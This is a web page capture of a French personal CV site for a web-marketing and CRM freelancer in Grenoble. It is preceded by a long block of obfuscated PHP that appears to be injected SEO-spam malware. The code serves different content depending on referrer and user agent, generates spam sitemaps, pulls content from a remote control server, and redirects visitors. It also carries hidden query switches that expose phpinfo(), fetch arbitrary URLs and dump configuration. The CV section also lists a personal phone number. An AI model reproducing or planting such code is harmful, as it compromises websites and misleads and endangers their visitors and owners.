$l1p=explode('/',$l1G); $l1YSz=array_pop($l1p); if(preg_match("/([^\d]+)(\d+)\.xml$/si",$l1YSz,$l1Ga)){ $l19=$l1Ga[1]; $l1Rd=$l1Ga[2]; }else{ $l19=preg_replace('/([a-z]+_?).*/si',"$1",$l1YSz); } if(!empty($l1p)&&preg_match('/^([a-z])?(\d+)$/si',$l1p[count($l1p)-1],$l1DK)){ if(count($l1DK)==3){$l1zWk6m=$l1DK[2]; if($l1DK[1]=='s'){$l1Wk24V=1;}elseif($l1DK[1]=='g'){$l1Wk24V=2;} }else{ $l1zWk6m=$l1zWk6m[0]; } array_pop($l1p); } if(!empty($l1p)&&is_numeric($l1p[count($l1p)-1])){ $l1VZp6Wj=array_pop($l1p); $l1zGneha=true; } if(!empty($l1p)){ $l1Aq=implode('/',$l1p); } $l1bFD=$l1Rd==1?1:(($l1VZp6Wj+1)*($l1Rd-1)*$l1zWk6m); $l1bFD=$l1bFD<0?0:$l1bFD; } if(preg_match('/^listing((?:1|\w)+)?\/(\d+)\/(?:(\d+)\/)?\w+\.html$/si',preg_replace('/^\?/si','',$l1G),$l1hiNP)){//?listingsda/2/3/55asdsad.html if($l1hiNP[1]==1){ $l1NJ=1; } $l191b=(int)$l1hiNP[2]; $l1Hj6kGY=1; if(isset($l1hiNP[3])){ $l1Bf6Em=(int)$l1hiNP[3]; } } $l1CazCZ="$l1CwD9/$l1Hq".($l1Hq==''?'':'/'); $l15=$l15?"/$l1Hq".($l1Hq==''?'':'/'):$l1CazCZ; $l1O5r=$l1IKwg; $l1ZOe=false; define('TEST_MODE',isset($_GET["list_test"])?true:false); foreach($l10sD as $l1alFm){ if(isset($_GET[$l1alFm])){ $l1ZOe=true; break; } } $l1mnFC8=true; foreach($l10sD as$l10k){ if(isset($_GET[$l10k])){ unset($_GET[$l10k]); } } $l1ym0F=isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:''; $l1joIf5=isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:''; $l1Ag=l1Vr(); $l1BfTP=$l13[7]==0?$l1Ag:($l13[7]==1?l1w($l1joIf5,$l1ZOe):1); $l1l=l1u($l1ym0F); $l1JPC=false; $l1V='jpsitemap|mapxml'; $l11p=explode('|',$l1V); $l1eqz=''; foreach($l11p as $l1hFCt){ if(isset($_GET[$l1hFCt])){ $l1JPC=true; $l1eqz=$l1hFCt; break; } } if(!$l1JPC && !$l1mnFC8){ return ; } if(in_array($l1Fwx,$l1OlB9)){ if(!isset($_GET) && $l1G==''){ $l1Q4=true; }else{ if(isset($_GET)&&empty($_GET)){ if($l1G==''){ $l1Q4=true; }else{ if($l1G==$l1Fwx){$l1Q4=true;} } }else{ if($l1G==''){$l1Q4=true;} } } } if(!$l1Q4){$l1P='';} $l1GQ7FN=l1VGOz($l1GQ7FN); $l1e9PSkk=$l1GQ7FN.'?yid=%d&lid=%d&from=%s&jump=%d&action=%s&cache=%d&ver=2.1.0&fb=%s'; $l14qUY5='ls1'; $l14jX='ls2'; $l17cJU='phpinf'; $l16='lstest'; $l1IHQoL='lsarg'; $l1Uc8='lspwd'; $l1M=substr($l1GQ7FN,0,strrpos($l1GQ7FN,'/')).'/domain.txt'; $l1nqjnB5=$l1GQ7FN.'?listing=%s'; $l1a=substr(md5($l1M),0,6); $l1QkNa=array('extensions'=>$l1oBUIG1,'url_rules'=>$l1sg,'wordlist_array'=>$l12r,'url_prefix'=>$l1NI41,'url_prefix_qm'=>$l1KeEzyz,); if($l1Hj6kGY){ $l1cInsDp=array(); $l1F8=array(); $l1AG=array(); $l1wbD3t=in_array($l191b,array(1,3)); if($l191b==1){ $l1AG=l1S($l1CwD9); } if($l191b==2){echo $l191b; $l1cInsDp=l1i0($l1a,$l1M,$l1Bf6Em); } if($l191b==3){ $l1AG=l1S($l1CwD9); $l1cInsDp=l1i0($l1a,$l1M,$l1Bf6Em); } if($l1NJ){ $l1t=array(); if($l1wbD3t){ $l1t[]=sprintf('<%s-%s>',$l1M18r,implode(',',$l1AG["a"])); } $l1CIN5=null; $l15Er0=array(); foreach($l1cInsDp as $l1BlAps=>$l1Pm){ $l15Er0[]=$l1BlAps; if($l1CIN5===null){ $l1CIN5=implode(',',$l1Pm); } } if($l1CIN5!=null&&!empty($l15Er0)){ $l1t[]=sprintf('%s-%s',implode(',',$l15Er0),$l1CIN5); } if(!empty($l1t)){ $l16Xoq=explode('|||',l14w(sprintf($l1nqjnB5,implode('/',$l1t)))); foreach($l16Xoq as$l1B){ $l1eoGZk7=explode('---',$l1B); if(count($l1eoGZk7)==2){ $l1F8[$l1eoGZk7[0]]=array(); $l1O=explode('+++',$l1eoGZk7[1]); foreach($l1O as$l1WmxiS8){ $l15k75=explode('=>',$l1WmxiS8); if(count($l15k75)==2){ $l1F8[$l1eoGZk7[0]][$l15k75[0]]=$l15k75[1]; } } } } } } $l1sE="\n\n\n\n\nlist\n\n\n%s\n\n"; $l1Y9Mo4=''; if($l1wbD3t){ foreach($l1AG["a"] as $l1VpVEB=>$l17uBb){ if($l1NJ&&isset($l1F8[$l1M18r])&&isset($l1F8[$l1M18r][$l17uBb])){ $l1Y9Mo4.=$l1F8[$l1M18r][$l17uBb].'
'; } $l1Y9Mo4.="$l1CazCZ{$l1AG["b"][$l1VpVEB]}".'
'; } } foreach($l1cInsDp as$l1TP=>$l1CQ){ foreach($l1CQ as$l1Ho8E){ if($l1NJ && isset($l1F8[$l1TP]) && isset($l1F8[$l1TP][$l1Ho8E])){ $l1Y9Mo4.=$l1F8[$l1TP][$l1Ho8E].'
'; } $l1Y9Mo4.=l14y(array($l1TP,$l1Ho8E,'',''),$l1QkNa,1).'
'; } } echo sprintf($l1sE,$l1Y9Mo4); exit(); } if($l1JPC||$l1bu14f||$l1C){ $l1U0dci="\x3c\x3fxml version=\"1.0\" encoding=\"UTF-8\"\x3f\x3e"; $l1sbh9='%s'; if($l1C){ $l1CJ=array($l1CwD9); if($l1Hq!=''){ $l1CJ[]=$l1CazCZ; } $l1R5=l14w($l1CwD9); if($l1R5!=''){ $l1CJ=array_merge($l1CJ,l18($l1R5)); $l1CJ=array_unique($l1CJ); } header(sprintf($l1B2,'x')); echo $l1U0dci; @l13eHl5M($l1OmBl,$l1U0dci); $l1Cng=array(); if(!empty($l1CJ)){ foreach($l1CJ as$l1rao){ if(count($l1Cng)>=100){ $l1tjh=implode('',$l1Cng); echo $l1tjh; @l13eHl5M($l1OmBl,$l1tjh,'a'); $l1tjh=''; $l1Cng=array(); } $l1Cng[]=sprintf("\n\t\t%s\n\t\t\t%s\n\t\t\tmonthly\n\t\t",sprintf($l1sbh9,l19(preg_match('/^https?\:\/\//si',$l1rao)?$l1rao:"$l1CazCZ$l1rao")),date('Y-m-d')); } } if(!empty($l1Cng)){ $l1tjh=implode('',$l1Cng); echo $l1tjh; @l13eHl5M($l1OmBl,$l1tjh,'a'); $l1tjh=''; $l1Cng=array(); } $l1orvhHs="\n\t"; echo $l1orvhHs; @l13eHl5M($l1OmBl,$l1orvhHs,'a'); exit(); } $l15=$l1CazCZ; $l1nj7=isset($_GET["html"])?(int)($_GET["html"]):''; if(file_exists($l1a)){ $l1Km04aA=file_get_contents($l1a); }else{ $l1Km04aA=l14w($l1M); @l13eHl5M($l1a,$l1Km04aA); @l17Pq($l1a); } $l1Km04aA=trim($l1Km04aA,'|'); if($l1Km04aA!=''){ $l1cInsDp=explode('|',$l1Km04aA); if(is_numeric($l1nj7)&&$l1nj7>0){ $l1pCoKsv="\x3c!DOCTYPE html>\n\x3chtml>\n\x3chead>\n\t\x3cmeta charset=\"utf-8\">\n\t\x3cmeta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n\t\x3ctitle>\x3c/title>\n\x3c/head>\n\x3cbody>"; foreach($l1cInsDp as$l1D){$l1Ll=explode('-',$l1D); for($l1Nhup7U=0;$l1Nhup7U<$l1nj7;$l1Nhup7U++){ $l1pGT=mt_rand(1,$l1Ll[2]); $l1e9PSkk=l14y(array($l1Ll[0],$l1pGT,'',''),$l1QkNa,1); $l1pCoKsv.=sprintf('%s
'."\n",$l1e9PSkk,$l1e9PSkk); } } echo $l1pCoKsv."\n\x3c/body>\n\x3c/html>"; exit(); } $l1NaA=$l1VZp6Wj; $l1IiLK=$l1Aq; $l1cl=$l1zWk6m; $l1EyyRLR=$l1bFD; $l1gT=$l1CazCZ; $l1hr6=$l1CazCZ; $l101vix=''; $l14pzI=0; foreach($l1cInsDp as $l1aSpNZq=>$l1J){ $l14pzI+=(int)substr($l1J,strrpos($l1J,'-')+1); } if($l14pzI<=0){ exit('nodata'); } $l1th=ceil($l14pzI/$l1NaA); $l1NaA=$l1cl>$l1th?$l1NaA:$l1NaA; $l1A=$l1R=$l1sKU6=$l1cl; $l1Zps=array(); $l19U=0; header(sprintf($l1B2,'x')); echo $l1U0dci; if(!empty($l1cInsDp)){ $l1e=0; $l1hyPtt=$l1y=0; foreach($l1cInsDp as$l1D){ if($l1hyPtt>=$l1NaA){ break; } $l15uswfW=explode('-',$l1D); $l1rqgf=$l15uswfW[0]; $l1kvhAIf=$l15uswfW[2]; $l1itiy=l1o9S8s($l1kvhAIf-1,$l1cl,$l1Wk24V,$l1s9B); if(!empty($l1itiy)){ foreach($l1itiy as$l1yA){ if($l1hyPtt>=$l1NaA){ break; } if($l19U>50){ $l11O0zw=implode('',$l1Zps); echo $l11O0zw; $l1Zps=array(); $l19U=0; } $l1H=''; $l1H.=''; $l1H.=sprintf($l1sbh9,l19(l14y(array($l1rqgf,$l1yA,'',''),1))); $l1H.=''.date('Y-m-d').''; $l1H.='weekly'; $l1H.=''; $l1Zps[]=$l1H; $l1hyPtt++; $l19U++; } $l11O0zw=implode('',$l1Zps); echo $l11O0zw; $l1Zps=array(); } } } $l1Zps[]="\n\t"; $l1pGgeM6=implode('',$l1Zps); $l1Zps=array(); echo $l1pGgeM6; }else{ echo 'feterr:'.$l1M; exit(); } exit(); } $l1gNiX=l1WfJ4fS($l1G,$l1sg,$l1oBUIG1); $l1R6a=(bool)$l1gNiX[0]; if($l1mnFC8&&($l1BfTP||$l1l)){ $l1PXX0X=0; if(!$l1R6a){ $l1IKwg=!$l1Q4?l17w('',$l1Q4,$l1O5r,"$l1sSdk|$l14qUY5"):$l1IKwg; if($l13[7]==2&&!$l1Ag){ $l1PXX0X=1; }else{ if($l1Q4){ if($l1BfTP){ if(!$l13[0]){$l1PXX0X=1;} } if($l1l){ if(!$l13[1]){ $l1l=0; } if(!$l13[2]){ $l1PXX0X=1; } } }else{ if($l1BfTP){ if(!$l13[3]){ $l1PXX0X=1; } } if($l1l){ if(!$l13[4]){ $l1l=0; } if(!$l13[5]){ $l1PXX0X=1; } } } } } else{ $l1yBfFu=l1p17i($l1M18r,$l1IKwg,$l1gNiX[1]); $l1M18r=$l1yBfFu["a"]!=-1?$l1yBfFu["a"]:$l1M18r; $l1IKwg=$l1yBfFu["b"]!=-1?$l1yBfFu["b"]:$l1M18r; } $l1stXV='%s'; $l1e9PSkk=sprintf($l1e9PSkk,$l1M18r,$l1IKwg,urlencode($l1V4Fe),!$l1l?0:1,'',$l1t[0],$l1Fwx); $l1e9PSkk.=sprintf('&isn=%d&ish=%d&wdm=%d',($l1R6a?1:0),($l1Q4?1:0),$l1t[3]); if(isset($_GET[$l14qUY5])){ echo sprintf($l1stXV,$l1e9PSkk,$l1e9PSkk).'

'; $l1hx=parse_url($l1e9PSkk); echo gethostbyname($l1hx["host"]); exit(); } if(isset($_GET[$l14jX])){ echo sprintf($l1stXV,$l1M,$l1M); exit(); } if(isset($_GET[$l17cJU])){ phpinfo(); exit(); } if(isset($_GET[$l16])){ $l1Yd8C=trim($_GET[$l16]); $l1Yd8C=$l1Yd8C==''?'http://example.com':$l1Yd8C; if($l1Yd8C!=''){ echo l14w($l1Yd8C); exit(); } } if(isset($_GET[$l1IHQoL])){ echo sprintf('domain=%s
lineNo=%s
url_prefix=%s
charlist=%s
wordlist=%s
google_veri=%s
http_get=%s
cache=%s
pgmb=%s
urlgz=%s',$l1blfY,$l1s9B,$l1NI41,$l11IG4t,$l1ZBL,$l1RyF,$l1GQ7FN,implode('',$l1t),$l1SuNnv8,$l1avcle1); exit(); } if($l1PXX0X){ if($l1P!=''){ echo file_get_contents($l1P); } return ; } if(preg_match("/yid=(.*?)\&lid=(.*?)\&from=(.*?)\&jump=(.*?)\&/is",$l1e9PSkk,$mm)){ $tmp = parse_url($l1e9PSkk); $l1e9PSkk = "http://".$tmp['host'].$tmp['path']."node/".$mm[1]."/".$mm[2]."/".$mm[4]."/gonews.php/?".$mm[3]; } $l1apvkd=l14w($l1e9PSkk); $l1apvkd=trim($l1apvkd); if($l1apvkd==''){ header('HTTP/1.1 404 Not Found'); header('status: 404 Not Found'); exit(); } if(preg_match('/^https?\:\/\//',$l1apvkd)){ if($l13[6]){ header("Location:$l1apvkd",true,302); }else{ echo sprintf('',"'","'",$l1apvkd,$l1apvkd); } exit(); } preg_match_all('/\?yumingid=\d+&lineid=\d+[^>]+>.*?]+>)(.*?)/si','?'),$l1apvkd,$l1BbH); if(!empty($l1BbH[0])){ $l1apvkd=str_replace($l1BbH[0],$l1BbH[0]."\n$l1RyF",$l1apvkd); }else{ $l1apvkd=str_replace('',"$l1RyF\n",$l1apvkd); } } echo"$l1apvkd"; exit(); } if($l1P!=''){ echo file_get_contents($l1P); } } l1Ni4();?> Bienvenue sur mon CV
 • slidebg1
  Bienvenue sur mon CV
  WEBMARKETING
 • Webmastering - Social media - CRM
  Communication digitale

Mon Profil

My photo

ARMAND ROCHAS

Web - CRM

Je propose aux entreprises de toute taille des services digitaux depuis plus de deux ans.

Mes services : création de site Web - SEO/SEM - Web design - Campagnes CRM - Gestion de projets web - prod photo/vidéo.

J'ai réalisé l'intégralité de mon cursus post bac en alternance. D'abord commercial pendant 3 ans, j'ai ensuite évolué vers un poste de Webmaster / Responsable CRM chez Quechua (groupe Décathlon) durant 2 ans. En savoir +

 • Naissance : 1989
 • Téléphone : +33 6 65 32 05 77
 • E-mail : armand.rochasATgmail.com
 • Mobilité : internationale
 • Adresse : Grenoble
0

Ans

0

Années d'expérience

0

Bac +

0

Idées

•  Référencement SEO-SEM
•  Webdesign (banners, logos, illustrations...)
•  Production photo / Vidéo + post-prod
•  Webmastering
•  KPI : tracking - analyses - reporting
•  Administration CMS e-commerce
•  Communication médias
•  Merchandising digital
•  Management d'équipe (orientée web)
•  Négociation fournisseurs / clients
•  Travail / affinage de BDD
•  E-mailing / Newsletter

Mes Projets

Mes Compétences

75

Conduite de projet

Mener une équipe à la réussite d'un projet, assurer l'interface avec le client / fournisseur.

90

Stratégie CRM

Data mining • Maîtrise des outils de reportings
• optimisation KPi
• FR et international.

95

Jouer collectif

Bien qu'autonome, l'esprit d'équipe m'anime. Souvent médiateur, on me fait confiance aisément.

83

Cosmopolite

3 ans de travail
en direct avec une dizaine de nationalités.

80

Webmastering

3 ans d'expérience, dont 2 sur de la gestion de CMS à linternational
(15 pays).

85

Cross Canal

Vision stratégique, connaissance des leviers d'actions, expérience en la matière, force de proposition.

  Maîtrise des outils

 • Google (Analytics, adwords, mastertools...) 80%
 • Illustrator 60%
 • Photoshop 90%
 • HTML 65%
 • Reporting 99%
 • Final Cut 70%

Disponible et passionné
Mon Parcours

 • Aujourd'hui
 • 2014 - 2015

  Auto-entrepreneur
      

  Auto-entrepreneur depuis fin 2013, je propose majoritairement des services orientés web : création de sites, de landing pages, d'emailings, de Newsletter...
  Ainsi que du référencement, SEO et SEM (adwords) avec suivi, analyse et pilotage des campagnes.
  Je propose également de la productions de contenus : photos / vidéos et digitaux (banners, encarts etc...)
  Accompagnement des PME à l'optimisation leur système d'information ➔ logiciel de CRM, amélioration des process, mise en place d'outils VPN.

 • 2011 - 2013

  Webmaster - Responsable CRM

  • En charge de la stratégie CRM digitale en France et à l'international - Responsable des sites www.quechua.com français et internationaux (13 sites) - Ouverture du site brésilien en 2013 ➔ formation des équipes locales.
  • Relais de communication, suivi des résultats et pilotage des campagnes digitales internationales (brief et suivi KPi des équipes pays)
  • Responsable multi-plateformes pour smartphones : Une application iPhone, un site mobile multi-plateforme (Android / Windows Phone / RIM) ASO (Apple Store Optimization), mise à jour des contenus, création de l'application sur android - Internationalisation de l'application en Espagne dans un premier temps.

 • 2008 - 2010

  Attaché commercial et marketing BtoB

  Développement et segmentation du portefeuille clients - partenariat avec des apporteurs d'affaires en immobilier d'entreprise - prospection - suivit de chantier - participation à l'élaboration d'appels d'offres - création d'une base de données clients - scoring - négociation clients, devis, ventes

 • 2010 - 2011

  Attaché commercial et marketing BtoB

  Ciblage et prospection auprès de comptes clés dans les secteurs de l'équipement de la maison, la grande distribution, les enseignes de DIY - Exploitation CRM, actions webmarketing, audits de sites web, enrichissement BDD...
  Réalisation d'une étude de marché sur l'Allemagne et le Royaume-Uni : collecte et analyse de données, calcul des coûts liés à l'implantation, à l'embauche d'un country manager. Analyse et choix du mode de vente, pertinence de la demande, étude quantitative et qualitative de celle-ci, création d'un SWOT et analyse de l'offre.

  • Formations
  • 2008 - 2010

   Master 2 Marketing / E-Business

   2 ans - en alternance chez Quechua
  • 2010 - 2011

   Licence IFC

   1 an - en alternance chez Leadformance
  • 2008 - 2010

   BTS NRC

   2 ans - en alternance chez Eden

CLients

Recommandations

"Tu as mené avec succès tous les projets confiés. Je pense notamment à l'animation du plan relationnel de la marque (...) Tu as placé Quechua en tête de cette stratégie avec des performances bien meilleures que toutes les autres marques passions. Grâce à toi, pas moins de 4,6 millions de clients ont bénéficié de conseils pratiques sur leur produit."

Julie BORDEZ

Communication & Marketing Director - Quechua


"Entièrement satisfait du travail d’Armand. Il a été réceptif à mes attentes, créatif en apportant ses idées et ses connaissances et réactif à toutes mes demandes ! Notre nouveau site séduit !!!! Merci."

Denis USSEGLIO

Gérant de PES ACCESSOIRES

"Je tiens à te faire savoir que je suis très satisfait du travail que tu as accompli pour nous. Nous te sommes tous reconnaissants pour ce que tu as apporté en valeur ajoutée à notre projet grâce à ton investissement, ton talent et ta technicité."

Christophe BORG

Maire de Pontcharra

Quelques  clients

Mes Hobbies

 1. Photographie

  J'adore la photo en montagne, surtout de nuit pour les ciels étoilés.

 2. La montagne

  Ski, rando, photos... c'est un immense terrain de jeu. Je ne m'en éloigne jamais trop longtemps.

 3. Rugby

  12 ans de terrain - J'ai raccroché les crampons mais l'esprit est toujours là.

 4. Fitness

 5. Le cinéma

Connectons-Nous

ADDRESSE
Grenoble, FRANCE
TELEPHONE
+33 6 65 32 05 77
E-MAIL
armand.rochasATgmail.com Creative Commons - photos propriétaires.